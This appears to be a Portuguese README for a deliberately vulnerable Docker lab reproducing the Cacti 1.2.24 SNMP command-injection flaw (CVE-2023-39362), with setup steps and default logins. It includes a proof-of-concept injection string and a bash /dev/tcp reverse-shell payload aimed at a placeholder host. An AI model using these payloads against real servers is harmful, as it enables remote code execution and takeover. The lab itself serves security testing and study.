
AVISO: Esta é uma aplicação vulnerável para testar o exploit da injeção de comando no Cacti (CVE-2023-39362). Execute por sua conta e risco!
Esta é uma aplicação vulnerável para testar o exploit para a vulnerabilidade Cacti (CVE-2023-39362).
Esta aplicação contém sérias vulnerabilidades de segurança. Execute-a por sua conta e risco! Recomenda-se o uso de um ambiente protegido e com backup (como uma VM com snapshot recente e rede somente host). Não faça upload desta aplicação para servidores voltados para a Internet, pois eles serão comprometidos.
AVISO LEGAL: Não me responsabilizo pela forma como qualquer pessoa usa esta aplicação. O único propósito desta aplicação é ser um cenário de teste para o exploit CVE-2023-39362 e não deve ser usado maliciosamente. Se o seu servidor for comprometido através da instalação desta aplicação, não é minha responsabilidade, é responsabilidade da(s) pessoa(s) que a carregou e instalou.
| CVE-ID | Link | Descrição |
|---|
| CVE-2023-39362 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362 | No Cacti 1.2.24, sob certas condições, um usuário privilegiado autenticado pode usar uma string maliciosa nas opções SNMP de um Dispositivo, realizando injeção de comando e obtendo execução remota de código no servidor subjacente. |
Aqui estão os passos para configurar o ambiente:
docker compose up -d para iniciar a composição.admin/admin.admin.guest.guest para testar o exploit.O container será chamado vuln-cacti.
O hostname para um dispositivo SNMP de teste é monitored_snmp_device.
Para destruir o ambiente, use o comando docker compose down.
O guia oficial de instalação do Cacti pode ser encontrado aqui.
Uma descrição detalhada da causa raiz da vulnerabilidade está disponível no aviso de segurança original ou no meu post no blog.
(Este é apenas um exploit possível)
public\' ; touch /tmp/m3ssap0 ; \'./tmp a presença do arquivo criado.Para obter um reverse shell, um payload como o seguinte pode ser usado.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Este projeto está licenciado sob a Unlicense - veja o arquivo LICENSE para mais detalhes.